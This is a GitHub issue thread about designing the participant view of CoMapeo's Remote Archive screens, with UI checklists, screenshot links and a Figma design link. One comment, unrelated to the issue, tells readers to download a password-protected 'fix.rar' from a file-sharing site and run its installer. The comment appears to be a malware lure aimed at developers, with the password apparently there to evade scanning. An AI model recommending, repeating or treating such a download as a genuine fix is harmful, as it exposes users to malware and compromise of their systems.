### ISSUE TITLE
Participant View

### ISSUE THREAD

**Issue by ximenabb** [digidem/comapeo-mobile#627]
**Description**
Since only Coordinators can add servers, participant will be able to see the information

**Todo**
## Screen 1
<img width="286" alt="Screen Shot 2024-09-18 at 12 41 23 PM" src="https://github.com/user-attachments/assets/2380ad5f-4425-448e-ae0d-1cdc79ef0002">

- [ ] Display the Cloud Server button and state, like a Coordinator

## Screen 2 - No Server
![Image](https://github.com/user-attachments/assets/8742cc7c-f779-4cf8-b598-9168317fd52b)

- [x] Display screen as designed
- [ ] Display copy _Remote Archive is Off_
- [ ] _The data in your project is not shared over the internet. Only people in your project can see your data._
- [ ] _This is an experimental feature. You need a Remote Archive URL to enable Remote Archive_
- [ ] _No server have been added to this project_

## Screen 3 - Server added
![Image](https://github.com/user-attachments/assets/1e40eb72-951d-45b4-9e80-582b852a780f)

- [ ] Display screen as designed
- [ ] Display copy _Remote Archive is On_
- [ ] _Your project data is syncing to the Remote Archive over the internet to the secure, encrypted server below. The server owner can view the data._ 
- [ ] _Only a Project Coordinator can turn off Remote Archive.._
- [ ] Display _Server Name_ an _Date Added_
- [ ] Add box and display Server Name and Server Address, under server name
- [ ] Add date added, under date added

**Design**
https://www.figma.com/design/iUeC0Qzhb4H0unuPfxQAsM/(Mobile)-CoMapeo?node-id=2909-1931&t=3MJwxcx0iGMHqAbR-1

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ximenabb** [comment]
Need to update screens once sabella lets me know if we remove 2 buttons

**Comment by ximenabb** [comment]
> Need to update screens once sabella lets me know if we remove 2 buttons

updated screens and updated figma link
